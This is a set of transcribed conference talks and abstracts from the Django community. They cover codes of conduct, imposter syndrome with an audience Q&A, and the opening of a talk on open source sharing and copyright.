you're interested you can come talk to us. Okay, I see we are kind of over time, so let's recap. We've shown you a bit of the history of the Django community and the Code of Conduct, and we also showed you the mistakes we've made when we served on various response teams, and how hard it is to remember everything if you don't have step-by-step instructions. And we showed you what happens practically when you receive a report and what steps we take to resolve it. So this is our formal process that we're trying to stick to and document so that it can be reused by other communities out there.
And we do all this work in the open because we believe that the Code of Conduct is not only a problem for the response team. It's also not only a problem for conference organizers, and it's not only a problem for the DSF or the PSF; it's a problem for the community as a whole. And building a safe and welcoming environment is an extremely hard task. And even though we don't know yet how to do it right, we constantly try to push the limits and set higher and better standards every single year. And we want to believe that the Django community will never stop pursuing being the inclusive and awesome community we are so proud to be part of. Thank you.
|
The Django and Python communities have made codes of conduct a standard feature for many years now. But what exactly is a code of conduct? How does it work in practice? Why do we need them? What should you report? What are the consequences of having one? We (Ola & Baptiste) have been working as CoC points of contact at many conferences for the past few years: EuroPython 2014, DjangoCon Europe (2015 and 2016), and Django Under the Hood (2014, 2015). This has given us a unique insight into the inner workings and practical implications of codes of conduct and we want to share it with the Django community. The talk will start with a brief history of codes of conduct. From there, we'll go over some of the challenges and pitfalls of implementing a CoC in our communities or events. After that, we'll show how CoCs work in practice and answer some common questions about them. We will then briefly talk about how lessons learnt from the CoC world can be applied successfully in your daily job to grow supportive and strong teams. Finally, we'll finish off by showing the new standardized CoC processes that we've been working on. With this talk, we want to continue the process we've started of bringing CoCs to the front of the stage, making them more transparent and less taboo. We believe that CoCs are an essential part of any community and we'd like to share our vision for how we think ours should work.
|
10.5446/32721 (DOI)
|
Come on, y'all! Thank you everyone for joining us for The Fraud Police Are Coming: Work, Leadership, and Imposter Syndrome. For those of you who like Twitter, like us. Here is all of our Twitter information. You can find Amanda at Captain Pollyanna, me at Babe from Toyland, and we have a session hashtag which is Imposters Unite. So tweet away. So how did we get here to be talking to all of you about Imposter Syndrome today? It started with me getting mad on the Internet. I really enjoy reading career advice articles and I'd been seeing a lot of them about Imposter Syndrome a couple of years ago. I read them and I read them, and it wasn't that Imposter Syndrome didn't seem real to me, it was that the advice didn't seem good. And so I started talking to people, I started tweeting about it, I talked to Amanda about it, and this was a couple of days before Bar Camp Philly in November. And Amanda kind of strong-armed me into co-presenting a talk on Imposter Syndrome, which I might add I did not want to give because I did not feel qualified to speak on the subject. So we started talking last November, as Brianna mentioned, at a bar, and I feel like we haven't stopped since. I really learned about Imposter Syndrome that night and I identified really strongly with it and I just dove in. I learned as much as I could, we read as much as we could between our conversation in Bar Camp Philly and when it came time to present, we told people what we knew and then we sat back and waited for questions. And we got a lot of people telling us stories then and throughout the rest of the past seven or eight months. People that were feeling this way too. And I just felt, and Brianna I know feels, that it's so important to talk about this. So we're so excited to be having this conversation again today with you. Alright, so to start, what is Imposter Syndrome? The term was coined in 1978 by Pauline Rose Clance and Suzanne Imes, who did the groundbreaking research on what Imposter Syndrome was. They initially did a study among high-achieving women and they defined it as a failure to internalize accomplishments. It doesn't particularly sound meaningful. The way that we like to describe it is the nagging feeling that you are over-esteemed, under-qualified and on the verge of being found out as a fraud. So we wanted to keep having this conversation because not everyone knows the term, even though they might be feeling it. So if you've already self-identified, you're in good company. Just look around you, guess who else feels like an imposter? This guy. Einstein was quoted as saying, the exaggerated esteem in which my life work is held makes me feel very ill at ease. I feel compelled to think of myself as an involuntary swindler. Maya Angelou said, I have written 11 books, but each time I think, uh oh, they're going to find out now. I've run a game on everybody and they're going to find me out. Now we have Jodie Foster, a confident actress who's been in tons of movies. When she won her first Academy Award, she was quoted as saying she thought it was a fluke. It was the same way when I walked out on the campus at Yale. I thought everyone would find out, they'd take the Oscar back, they'd come to my house knocking on my door and say, we meant that for someone else. We meant that for Meryl Streep. Meryl Streep said, I don't know how to act anyway, so why am I doing this? The point is that we've heard about imposter syndrome from people in basically every profession that we've talked to.
Professors, researchers, programmers, bankers, real estate agents, designers, people in every stage of illustrious careers. All of them share similar stories. In fact, some research shows that about 70% of people suffer from imposter syndrome. I personally think that might be an underestimate because this is 70% of people studied who admitted that they have symptoms of imposter syndrome. When the studies were originally done, imposter syndrome was thought to be a phenomenon that was present mostly in women, high-achieving academic women as Brianna mentioned. As time has gone on, it's clear that it affects people of every age, race, gender, industry. Often it affects male imposters doubly, because they're already feeling like an imposter in their role, and then they feel like they shouldn't be having these feelings anyway, so it's like imposter times two. Right. There's that high-achieving women research that we talked about at the beginning, and part of what was interesting about that, and part of what led to more research being done among women exclusively, was that part of the identification for imposter syndrome was rooted in gender roles. But as time has gone on, not only have we seen how this affects people of all genders, but also how it affects people who are different minorities in whatever context they're a minority in. For any of you with us so far, you know the feelings and you know you're not alone. Next up are some big indicators that you might relate to even if you haven't yet. So we're going to talk about the big six. And these are six big factors that were identified by researchers Sakulku and Alexander when they wrote the paper called The Impostor Phenomenon. The first of the big six is the imposter cycle. And we've drawn out the imposter cycle. Just take it in. I feel like the emojis speak louder than words, but we'll go through the words anyway. So it begins up here with a new project or task. Could be big or small. It can be a little exciting, but with that excitement can immediately come anxiety, self-doubt and worry creeping in. So you have to begin, and oftentimes you begin with furious over-preparation, for hours upon hours and days upon days. Sometimes also procrastination, also for hours or days upon days. The thing is, these two things can also come hand in hand. They can both be happening simultaneously on the same day. Inevitably, because you're smart and you're talented, you accomplish the goal. You achieve something and it's immediately a feeling of relief. You're like, okay, it's done. It's off my plate. This is great. I can move on. But then you start getting feedback. Even if the feedback is overwhelmingly positive, great feedback, you're still in your head potentially discounting this feedback as either luck, like I just got lucky, this wasn't really meant to happen, or as the over-preparation: you're looking at the over-preparation and thinking how you expended so much effort, more effort than maybe your peers would have had to expend, and that if you'd spent more time on it, it would have been even better. But essentially it's bringing you back around to that increased sense of fraudulence, the feelings of anxiety and self-doubt.
But starting off in the new project or task, I'm going to start off with the talk, the version of this talk that we did in January at Panama in another room in this very building, because the bar camp talk was such a last-minute ordeal. But for that one, we had a good two months where we knew what we were up against. And so the anxiety and the self-doubt and the worry all started to come into play as soon as we felt that there might be some expectations as to the quality of our imposter syndrome talk. There had been some people at the off-the-cuff one we did at bar camp. But for those of you who have not been to a bar camp, expectations tend to be relatively low. It's an unconference where you decide what the programming is the day of. And so it's very casual in terms of giving talks. This was going to be an actual talk that people came just to see. So naturally we jumped straight into the procrastination slash over-preparation phase. For me that looked like going through my college alumni JSTOR account and looking at every single possible thing I could find on imposter syndrome, imposter phenomenon, and every variation thereof. And then also watching a lot of Parks and Rec and The West Wing. I was also doing that this weekend. If you look at my Instagram and my Twitter feeds, you'll see this cycle wonderfully illustrated. Like many people, I switch back and forth between the procrastination and the over-preparation phases very, very frequently. You may have experienced this yourself. Then after the talk, that was the accomplishment. People said we did a pretty good job at it, and I just discounted the feedback on that right there: people enjoyed it, not that we did a pretty good job on it. And then we felt a little bit of anxiety about how it went, if it was just because people had never heard of imposter syndrome before and it was their introduction to the concept. And after that you're rewarded with another project or task, usually one that's slightly heavier or slightly more difficult than the task before it. In this case, we are here. Alright, so number two of the big six, and they're all much shorter after the first one, I assure you: the need to be special or the very best. This manifestation of imposter syndrome is the one that keeps you as a big fish in a small pond, or where you focus on other people's perceptions of you rather than your own perception of how hard you worked. The next is the quest to be superhuman. And I know many of you may know this, but our expectations of ourselves are often a lot greater than the ones the people around us have of us. Our colleagues, our friends, our loved ones, even our bosses. With our jobs, we often set these really aggressive, sometimes unrealistic, sometimes superhuman goals for ourselves. And at home we often double these expectations, trying to tick a hundred things off of our to-do list, and we'll get more into that later. The quest to always be doing more, and the eventual burnout, leaves us feeling like a fake: if I were really good at my job, I could handle all of this, even though it might be too much. Fear of failure. Who has heard the phrase, fail fast, before? Anybody ever notice how they really undersell how much it sucks to fail? We talk a lot about failing fast and failing big, but falling on your face sucks. Especially when you're constantly rewarded for doing well on a task by having to perform on a larger and larger stage or in front of more people. And this also leads into fearing success, which is something we'll talk about a little bit more in a bit.
Next is the denial of competence or the discounting of praise. When we describe our accomplishments with words like just or merely or only or minimizing them. Then when we're complimented on our work and praised for our skills, and we say, well, it could have been better. Or you see, I just got lucky. Or thanks. But we're feeling fraudulent and thinking that discounting this praise is making us more humble. And if we just accepted it, it might feel like cheating. Unfortunately, you're also telling the person praising you that they're wrong, and that's not great either. The last of the big six is fear and guilt about success. This manifests in a few different ways. One of them is not wanting to become successful in case you fail, which is tied to number four. There's also guilt about success that's related to, did I deserve this? Should I have been the one to get this? And also create distance when you're spending time with people who are close to you who didn't succeed in the same way that you did. You see this sometimes with first generation college students, where there's some distance that's created between them and the rest of their family. So did anybody identify with any of those big six? Did anybody not raise their hand because you wanted to see what everybody else was going to do? So what we're going to do is we're going to take about 30 seconds to sit here, and if one of them rang true to you, or all of them rang true to you, then take a minute to write down or make note of one thing that you would like to do that feeling like an imposter has been holding you back from. Assuming you've all written down the one thing that you feel like imposter syndrome is holding you back from, we'll get into the next topic, which is it gets better, right? And we have some news that may not be easy to hear, but it might make sense to some of you who are further along in your career and may have experienced these feelings for a while. And that is the more that you know, the less you think you know. Breanna will explain more. So some of you may have heard of the Dunning-Kruger effect, and this is kind of what this is about. Dunning and Kruger did research on perceived competence levels. Basically, here's an illustration done by Jessica Hagee from ThisisIndexed that shows the more education you have about a given subject, the more you know. And also, the more education that you get on a given subject, the more you know you don't know. So when you're starting to learn something new, you might think that you're a rock star immediately. An example of this that comes to mind for me is the first time I sat down and tried to learn some HTML. And I remember the feeling when I got something to say, hello world on a page that I made, and I was so proud. Like, I can make so many websites, hundreds of websites a day. And then I tried to do, I don't know, anything else. Right, so like once you have that initial understanding, you feel great, and then you start to realize how much you don't know. And wonderfully, the gulf gets bigger, the more experience you get. So if you feel like an imposter right now, it's only going to get worse from here, I am sorry. And another wonderful illustration from ThisisIndexed that displays the difference between Dunning and Kruger and the imposter syndrome. With Dunning and Kruger, you think that you're really great, and you're not, and with the imposter syndrome, you think that you're really bad, and you're great. 
And it's really hard to know what the difference between those two things is, but we're going to work on it. So if you're thinking, how does this affect me? I have a sense you might know already. We talked about being superhuman, and trying to be superhuman. And we often have high expectations and low levels of forgiveness for ourselves. We work long hours, we miss out on sleep, and sometimes fun and enjoyment, because we're trying to do all the things. We feel like failures when we can't do it all. In fact, I found a copy of Brianna's To Do List. I hope she doesn't mind if I share it. It's not actually mine, I didn't write this. Sarah Cloak wrote this wonderful list, 95 things I should do every day according to the internet, including such important highlights as 'wear smart professional outfit carefully selected from capsule wardrobe' and 'shower, make sure water temperature isn't too hot.' I think meditate is on here about three different times. And if you are anything like me and really, really love looking at articles on the internet that tell you everything you're doing wrong about your life, this might be a narrative that you have running in your head pretty frequently, particularly when we're looking at a culture of life hacks and 12 things that real leaders do before breakfast. And so the end result of that is that people with imposter syndrome are less likely to raise their hands. This is according to some research from Rigaue and a number of research partners: people who have imposter syndrome in the workplace are less likely to volunteer for projects that fall outside their job description. They're less likely to take on new things and they're less likely to participate in a way that is beneficial for the organization but not for them as an individual employee. And Brianna and I were lucky enough to hear a related talk by the very brilliant Amy Cuddy. She gave a TED talk about presence. She just published a book by the same name. And she talks about how our posture affects our mentality, and the more space we take up, the bigger that we are, the better that we feel and the more confident and present we are. The opposite can happen if we don't feel confident and we're trying to almost go within ourselves and shrink away, making us even less likely to participate, to put ourselves in situations where we might not know everything and, like Brianna said, less likely to raise our hands. And so what does that wind up feeling like? Self-doubt. You're less likely to start new things. Like I said, you're less likely to take on new projects and you're not very good at evaluating your own performance. Anxiety. I think we've all felt something like this. The feeling of, is it all going to come crashing down? What if I can't pull it off tomorrow? Fear of failure and fear of success. Then the feeling of isolation. And this seems to be big in some of the people that we've talked to that didn't really know imposter syndrome was so common. It's the feeling that no one else feels this way, that you're all alone, everyone else seems confident, knows what they're talking about, and that the people around you and your peers are smarter than you. Shame. This is a big one for Brene Brown, if anyone else has a similar favorite researcher storyteller. It's the only one I know of. But feeling embarrassed not to know things. Feeling like your work wouldn't stand up if somebody who actually knew what they were talking about were to look at it.
And then last there's despair, which seems like a really heavy word, but it's that feeling of, there's no way this is going to get better, I'll never catch up to my peers, and I'm stuck feeling this way always. In short. We have some solutions. Alright, so like I mentioned at the beginning of this talk, when I first started reading about imposter syndrome, I saw some common advice about it that didn't sit right with me, and the number one most common piece of imposter syndrome advice I saw was this: fake it till you make it. I really dislike fake it till you make it. And here's why. Fake it till you make it relies on dishonesty. And it doesn't address the core issues related to imposter syndrome. The whole concept of fake it till you make it is fine to get you in the door, but then you get there, and maybe you learn the thing that you're supposed to learn, or you pick up the skill you're supposed to pick up, and then you're rewarded in some way with a promotion, or you take on more responsibility, and then you have to fake that thing. And what you wind up in is a perpetual fakeness cycle. And when does it end? So instead, think about what you value, and what the kind of place that you want to be in values. Amanda and I came up with five values of our own. The first one is curiosity. Curiosity is fundamentally incompatible with fake it till you make it. Fake it till you make it assumes that you have to act like you know everything, and curiosity encourages you to ask questions. And motivation. Motivation is what gets us up in the morning. It's what drives us to make things better, whether that means by helping people or solving problems. And your motivation is fueled by passion. And I think we can all identify that as a value that we have. Truth: if you're already acting like you're at where you want to be, then how are you going to actually get there? Humility. And this may seem like a contradiction since I know I've been talking about accepting praise and owning your accomplishments. You can do these things and still be humble. Humility is valued because it means you're not being egotistical or vain or conceited or, as I'd like to put it, a bragging jerk face. And number five, empathy. You can't hear somebody if you're too busy focused on what other people are thinking of you. All right, so when you look at this list of five values, what you see is that it's not about what you know. It's not about specific languages. It's not about any kind of itemized checklist that you could possibly address. This is about how you think and the kind of person that you are. We talked before about the six ways that you could be experiencing imposter syndrome. And what we wanted to go into next are the ways that you can leverage these feelings for good. And we present to you not just the big six, but the manageable, not-that-bad six. So the first was the imposter cycle, which you remember was that long journey of experiences that lead to one another that we kind of get stuck in. And the way around that is to name it. Stopping the cycle is all about recognizing that you're in it. If you can anticipate your next move or reaction, you can intervene on your own behalf. Reversing negative feelings in self-talk can be tough, but you can take this opportunity to feel empathy for yourself and those around you who may be in the same boat and may be feeling the same things that you're feeling. This is one that can be really helpful if you do the same task multiple times as well. You get to learn what your own cycle is.
I know about three days ago getting ready for this talk, I knew that while I felt fine at the time that within the next 12 to 18 hours I was going to start freaking out. And I did. And then I watched CJ Craig on the West Wing and calm down. My touchstone. So number two, the need to be special or the very best. I would like to offer you there is no very best. There is no single best Python programmer in the world I can assure you. There is no single best anything in the world. And in any kind of situation where you see somebody who is supposed to be the best at anything, it's not the only way to measure the best at that thing. This may sound cliche, but you are awesome and you don't have to be number one in anything because there is no number one in anything. Be proud to be counted among your talented and intelligent and wonderful peers. And you can lift each other up, but you can't lift each other up if you're constantly trying to one up each other's accomplishments. We talked about the quest to be superhuman and trying to do everything under the sun, everything that we think we should be doing. Well, our remedy for this is to stop. Just to stop. You have to stop holding yourself to unrealistic expectations. Prioritize the important things. Assess actual knowledge gaps that you may have and start learning things that can help you. But pick one thing at a time. Choose one thing that you could start learning today or tomorrow that could help you get better at your job. But try not to set those goals for yourself where you're trying to do 10 things at once. You're not boiling the ocean. You don't have to do everything. And setting small goals for yourself is important and also being able to forgive yourself when you don't achieve all of your goals. So you don't have to do 95 things a day, even if the internet says you should. Alright, fear of failure. Redefine failure. This is a huge one. Obviously, all successful people have failed. We talk about this all the time. But taking your failures as a failure of the thing that you did and not a failure of you as a person is extremely important for addressing imposter syndrome. And this is something that almost everyone I know has to remind themselves of constantly. The next is the denial of competence and discounting praise. And we don't want to get caught up in this. Sometimes it's okay to just say thank you. It's easy to tell yourself you're being humble or you just got lucky. But if you worked hard, accept the compliments. If you're criticized, you can take it in stride. But if you're getting a compliment, remember you have to give the compliment giver the respect that they deserve. And remember that their point of view about your skills has value. Internalize the accomplishment and recognize that your skills, your drive, and your talent are what got you here. And finally, fear and guilt about success. For one thing, get out of your own way. Just acknowledge that success can be scary. That while that is scary thing, you can motivate, inspire, and kickstart your friends and colleagues toward success by displaying your own. Don't feel guilt for beating out others for awards or promotions. It doesn't mean to be ruthless. It means accept that with the responsibility that it comes with. When you are recognized for doing something, when you get a promotion, recognize that as an opportunity to lead and to help other people achieve success. Know that the success in that one instance can be a great reminder for the future. 
And then help bring other people to success with you. There's so much at stake for us as a culture of increasingly educated, talented, and skilled people, most of whom don't know how great they are. For those who come after us, we need to embrace our inner imposters and talk nicely to them about how we're growing and becoming better and about how far we've already come. Remember that you deserve to be where you are, to go where you're going next, and to help others gain confidence by sharing your knowledge. We're living in a world where smart and empathetic people are self-selecting out of opportunities. It's important on an individual level, but we also know that representation matters. We are motivated to succeed when people who look like us and face challenges similar to our own succeed before we do. Leadership doesn't have to come from the top. So at this point, we'd like everybody to take a look at whatever you wrote down a few minutes ago. We hear the phrase a lot: what would you do if you knew you could not fail? It's an unrealistic viewpoint, and we're not asking anyone that, but we are asking you to consider what is important enough to you that it's worth going through all of this stuff that we just talked about. We'd like to end the regular part of the presentation with this wonderful quote by Kelly Sue DeConnick, who's a comic book writer: the shows don't limit themselves to the fights they know they can win. So thank you all for joining us. And now we'd like to take a few minutes. If anybody would like to share any of the things that imposter syndrome might have been holding them back from, or an example of experiencing imposter syndrome in your own workplaces or personal lives. Thank you so much. Thank you. Thank you. First of all, I want to thank you a lot for saying this out loud. It was really great. But I have a question for you, because what about the fear that you're so ignorant about something that you can't actually realize how bad you are at it? I think what you guys are talking about here, it actually assumes that you can realize that maybe you're bad at something. But what about if you don't have that knowledge? That's a really excellent question. One thing that we originally had actually as a part of our slides, and we couldn't quite get it to work in, was about the importance of both asking better questions and providing better answers. And this is not a thing that's specifically for one individual to do. But one thing that I've seen is people have questions about something they have a really elementary understanding of. They ask a question, and then the person they ask the question of says, oh, you don't know that already? Or oh, they haven't covered that with you? Or oh, how did you not figure that out yet? And so on the flip side of that, for anybody who's concerned about feeling like they don't know enough, be sure that you're providing answers in a way that you would want to hear them. But in terms of knowing how much you know, I would recommend really getting immersed in a community of peers and helping each other.
Who am I to go and talk to a bunch of people that probably are a whole hell of a lot smarter than I am, and know a lot more about this stuff? But what's really cool, especially in the Django community, I'm sure you guys can appreciate this, is the community was super supportive. Everybody's really positive. So to your point, there's definitely some risk to it, but especially if anybody, more specifically if anybody's thinking about, or hesitating about doing a talk, especially in this community, go for it, you'll be fine. Promise. I promise you'll be fine. That's great. Thank you for that. And something we heard that I'd like to share is, we were talking about this before we came in here today. One of the things that Amy Cuddy spoke about in her talk about presence was, when she gives a talk, one of the primary things that she does to feel comfortable is to trust her audience. So going into a presentation or a talk with the knowledge that on the whole, people are good people, and they want to listen to what you have to say, and they are curious, and they are empathetic. And I think the Django community is a really good example of a place where you can trust your audience. I always have an issue where I feel if I'm not the best at something, I'm automatically the worst at something, which always gets in my way. And to prove that a little bit, I was using the wrong hashtag through the entire talk. And then I got there and I'm like, ah, this is horrible. So will you please forgive me? Yes, absolutely. Also, there are two ways to spell imposter, and I didn't clarify which one we were using at the beginning, so that might be my fault. Here we go. It's kind of nerve-wracking getting up to this mic. I guess I've got a comment, because starting out, not having ever been hired in the tech field, but really liking it, you go online, try to get help, and we've already had talks on this and everything, but you might write in a question to Stack Exchange, and then somebody writes back, and it's like, go study here, why didn't you study this before you asked a question? So it's really hard, because you really don't know much. But I feel like now I've realized that if I'm just focusing on what I want to do, I'm doing projects that I like, and I'm so curious about them, that it just doesn't matter as much anymore, and all that's kind of going away. And I feel like I'm just following my heart. And that's why I'm here. It's kind of cool, but you guys are awesome, by the way. I mean, like, this is a cool place to be. So, yeah. Thank you. I would like to share kind of two different varieties of this that I see in myself. One is, I don't think I unrightfully think of myself as somebody who has to fight with laziness. I like it when things work and they work well, and I want to get to that point immediately. And I know this about myself, something I've struggled with my entire life since I was a teenager. Probably before, but nobody pays attention when you're eight. But in trying to deal with that, in trying to make sure that I don't slip into that kind of laziness, I almost get into kind of like, I feel like an inverse fractal. You know, not the kind that goes out and gets more detailed because you can see it because it's bigger, but the kind that keeps going inwards, you know, infinitely.
You know, and that's really hard because it's a matter of, unlike the examples that you gave in your talk where, you know, people will put in 12-hour days because, you know, oh, I have to get this done to prove something because they will get it done. Sometimes I find myself not getting it done. You know, I'm putting in those 12-hour days and it's not getting done because it's not perfect. Or, you know, the other thing in the open source community is, you know, like the last fellow just mentioned, is that we tend to be rather ruthless. Not necessarily the Django community, but, you know, in the open source community. With new people. You know, we get on their cases about, you know, well, you read all those man pages. Didn't you go to read the docs and read that, you know, 400 pages of documentation and understand everything perfectly the first time? Because, you know, there are probably a few of us that can do that and most of us can't. But it's also two is kind of recognizing one's part in the term inner asshole. Because we feel that with ourselves. We're like, I haven't done enough groundwork to ask that question yet. Or, I want to fix this thing in this particular project. But this is absolutely not up to the standards of the project, you know, the people in the project. And, you know, you don't even give them the opportunity to tell you this is garbage. You know, you just kind of, you know, plug yourself into that. And ultimately, you know, in six months, you'll have the perfect patch set. But in the meantime, you know, it's still broken. So, anyway, I just wanted to. Thank you for that. I'd imagine that's not unrelated to the number of web developers I know who don't have their own personal websites. Thank you so much for this talk. I really appreciate that you came at it from the perspective of like knowing that we all occasionally or maybe frequently have this imposter syndrome and we, and how to sort of address that within ourselves. But I also feel like I often find myself in a different position, which is that I often find that I am in a group, you know, whether that's in a workspace or with my friends, where I actually feel like I have a fair amount of confidence. And I feel like sometimes people around me have less confidence than, you know, that they deserve. And I would love to hear a few thoughts on how you create environments like conferences or workspaces or even like how you deal with it in your social groups, you know, how you create places that support people who are experiencing some imposter syndrome. Yeah, I think we touched on that a little bit, what we were talking about succeeding and how when you succeed, you're not only benefiting yourself and the work that you've done, but you're able to inspire others. And it goes back to what Brianna was saying before about giving good answers when people ask you questions and not being the guy or the girl who says, oh, you should have read that in the documentation or, oh, you should know that already or why haven't you learned that? 
But being the person that answers questions in a really helpful way and in a way that can build people's confidence, and pointing people in the direction of resources that they might not know about that can help them build their knowledge and continue to grow as developers and as people, and being able to kind of be supportive to your close network so that when you're introduced to someone or you speak with someone outside of the network at a conference like this, you feel like you have practice in being supportive and in being empathetic and in answering people in a clear way that helps them. But also default to checking in with people to make sure that they have the necessary baseline knowledge for whatever conversation you're about to have. I know that one thing that has made me feel like an imposter several times, several is an understatement, many, many times in the past, is being part of a conversation and then realizing about two minutes into it that I don't know what's happening, and 20 minutes into it that I haven't known what's happening the entire time. And then there's also the assumption from other people that I know what's going on, and it's awful. Thanks for the question. Thank you. I want to do my sharing portion now. So I am a, I work in IT for a university, and I haven't completed a formal education, and that is terrifying. It's terrifying to say to a large group of people. This is the second time I've heard your talk, and it is the second time I've had the chance to share this with a large group of people, and it feels, it felt better the first time, hoping it makes me feel a little bit better this time, so I just want to say thank you for, you know, giving this talk. I, some, I think you might have been the one in this talk to say, I don't know exactly where I heard this, but I'm reminded that the people who hired me knew this about me before they hired me, throughout my career, and are confident in my ability to do my job. And I have to remember that when I'm, you know, doing my job, because otherwise I'm terrified, so thank you. Thank you, Ryan. Thank you guys for your speech. It really resonated with me, kind of like, I'm sorry I don't know your name, but like you're saying, I'm self-taught too. And kind of when you first start out, you kind of don't think you're a programmer until you get to be an expert at like all these things. And I guess it's just more of a comment: like, if you're reading stuff and just doing it, even if it's just like following the examples, you're still a programmer. Don't, don't not call yourself one because you don't think you have the skill level; you're, you're getting there. So thank you. Yeah, that's definitely important. Thank you so much. There was a survey going around recently, and this is terrible, I should not be saying this into a microphone because I have no citation information for this whatsoever. But there was a large survey of developers. I can't remember where it came from. It was 48%, I believe, of developers in the survey who did not have any kind of computer science degree, which is not surprising anecdotally, but I've spoken to so many programmers that feel like it's just them, that they don't have a degree or they don't have one in CompSci. Okay. So I'll move this, I'm a little bit too short for the mic. Hi. So I guess I just kind of wanted to come down and speak even though like I'm freaking out right now. Because I just, because I didn't notice a whole lot of, well, at least this gendered female coming down.
So I kind of wanted to represent. I just wanted to share that I'm actually a sysadmin. I'm not a developer. So that's like number one. And like, I don't even know what I'm doing here. But like, it's also very traditionally male dominated, just like programming as I assume, but the whole Nick, Nick Dude vibe is very, you know, strong. And so that even so even just admitting that I feel like an imposter a lot of times makes me feel like that some like this is going to have like really bad repercussions for me in the workplace. I actually work at Wharton here. So there's probably a lot of people in this room that I'm like afraid to find my supervisor is not here. Thank goodness. So I can say this, but no one telling him that I have no idea what I'm doing on my job every day. But like, that's what I feel like. And there's probably people in this room who think I'm an idiot too. I don't care about you either. But like that's sort of the general thought process that like, I guess, goes through my head every day. And I have to try to read about imposter syndrome on the internet and I kind of try to remember myself and go through these steps. But it's like, it's a process every day. I've got to wake up and remember. Even if you think you're an idiot, you're the only idiot still doing this job. So you've got to like, you know, take yourself up. Thank you. Thank you. Thank you. Vertically challenger. I thought one of the most interesting things you said was that people with imposter syndrome and you know who you are, don't raise their hand. It's much easier to be smart if you set the agenda. So if you have someone who's giving you a coding exam and they want you to rebalance a red black tree or something like that and you vaguely remember that from way back when, you're going to look like a fool. It's the person who's asking the questions who has a lot of power. So if you put yourself in the position where you keep your hands down, you're never the person asking the question. So I think the counterintuitive part of the solution is to be the person who stands up and talks. The more you hide, the worse it is. Better to stand up and give it a shot. And even if you get shot down first time, learn from that and get up again and again and again until he holds you down. That's great. That's very insightful. Hi. So in about 45 minutes, I'm going to be standing there and I'm going to be giving a talk and I'm feeling pretty imposter about it right now. What did you guys do to psych yourselves up for this one? Thinking back to an hour from now, I think a lot of what we have tried to keep in mind and what we've told people actually as we've had these conversations for the past seven or eight months is that your set of knowledge, your set of skills is different from anyone else in this room. And there's, I want to say it's like a Venn diagram or close to a Venn diagram that people think of or that has been seen when thinking of imposter syndrome. And it was what everyone else knows and what I know being a very small part of that. But in reality, what someone else knows and what you know may have overlap, but you still have a lot to provide and a lot to offer. So trying not to go into a presentation or a talk, thinking that your audience knows everything you're already about to say and they're not going to be learning anything and they're going to be judging you and they're going to be sitting there doing something else. 
In reality, people are here and people are going to be at your talk because they want to hear what you have to say. And you know things that they don't know yet and you're going to be able to impart information on them that is new and that's exciting and that will potentially inspire them to do something great. Also, the layout of this room is terrifying as a speaker, but the people are really nice. All right. Thank you everyone for joining us. Thank you.
|
What is imposter syndrome? It's a failure to internalize your accomplishments. It's the nagging feeling you don't know enough, haven't done enough, don't have enough experience to do your job, land a new account, publish a new paper. It's feeling like a fraud and that you're about to be found out. The term was coined in a study by Pauline Rose Clance & Suzanne Imes in 1978 having to do with the habits and behaviors of high-achieving women, but it's recently become a hot topic in tech and career conversations - with good reason. Who does it affect? Originally a phenomenon studied among women in academic fields, studies (and anecdotal evidence) have shown it affects just about everyone. Sheryl Sandberg, Meryl Streep, and Maya Angelou have all commented about their own experiences with imposter syndrome. After we've asked, so have most of our friends and colleagues. We combine research with personal experience to provide the Big Six signs you might have imposter syndrome, so you can recognize the symptoms in yourself. How is it affecting me? Imposter syndrome can make us feel like we need to be super-people, adding and adding to our goals each day, with no end in sight. It means we might be less likely to raise our hands for new projects because we don't think we know enough. It might keep us from speaking up in meetings, seeking promotions, or talking at conferences. It can bring feelings of self-doubt, anxiety, fear, alienation, isolation, shame or despair. It can be paralyzing to a person's career. Does it get better? Thanks to the Dunning-Kruger effect, the more you learn, the more you realize how much you don't know. When combined with the imposter syndrome associated with increasing achievements over time, it usually gets worse. But...there's good news. Through identifying specific components of imposter syndrome, you can sort out what's a real area for improvement and what's mostly anxiety. Dealing with imposter syndrome is often part of the price of doing new, exciting things. We can help you figure out how to cope. This talk will also help you recognize imposter syndrome in friends, colleagues, and employees, and we'll help you think about how to best support them. (Hint: responding with compliments does more harm than good.) By the end of our talk, you'll learn how you can leverage the feelings of imposter syndrome to become a better leader, colleague and human.
|
10.5446/32724 (DOI)
|
Come on, y'all! Music Hi, well, thank you very much, Adrian, and hello, Philadelphia. A little quick heads up: towards the end of this talk I am going to discuss a couple of issues around depression and burnout. So as a trigger warning, if you need to take some steps for self-care, be advised. I'll flag this again before I start that section. As Adrian said, my name is Russell Keith-Magee. I've been around the Django community for a long time, including serving on the technical board, being a member of the core team. Django is an open source project, but it's not the only open source project I'm associated with. These days I'm spending most of my time working on the BeeWare project. BeeWare is an open source collection of tools and libraries for creating native user interfaces in Python, for desktop, but also for iOS and Android and for single page web apps. And I've been associated with a bunch of other open source projects as a user, as a contributor, as a project maintainer over the years. Now, if your parents were anything like mine, they drilled into you at a very young age that it's important to share your toys with the other children. And it's this sharing philosophy that is at the core of open source. Yes, I could tinker away with my own thing and build something useful and lock it away so that nobody else could see it. But if I share what I know, everyone gets richer for the experience. Others can see how my toys work, others can take my toys and use them, and I can use their toys to do the same. And if we work together, we can combine forces and build something truly magnificent together. However, as we grow up, we discover that it isn't quite as simple as just share. We can certainly aspire to this as a philosophy, but you have to be proactive. You have to set up the conditions that make sharing both possible and attractive. And there are people out there who weren't taught by their parents to play well with others. And so, while sharing is a good philosophy to maintain, it's also necessary to protect yourself. Si vis pacem, para bellum: if you want peace, prepare for war. Because when some nefarious individual has stolen your toys, it's the worst possible time to discover that you're not protected. What I'm presenting here is a redux of the things that I've picked up in my 20-something years as a software engineer, preceded by another 10 years as a software enthusiast, and in particular from the experience I gained in my role as president of the Django Software Foundation. The role of the DSF was and is to be the coordinating entity around the Django project. The DSF is charged with ensuring that Django as a project can continue to exist. This means establishing the conditions that enable Django to thrive and providing the big stick of protection for the project's assets. Okay, so let's take a look at a couple of areas where you need to have your wits about you if you are going to be sharing your toys with others. Start with copyright. What is copyright? Copyright is the right created in law, granting a creator of an original work the exclusive rights to decide how that work is used and distributed. Copyright is granted immediately and by default to the person who creates the piece of work when they create it. If you write a song, write a book, write some software, you are the creator of that work. And you have the right to decide how that creation will be used. A copyright, using the word as a noun there, is property. It's intellectual property.
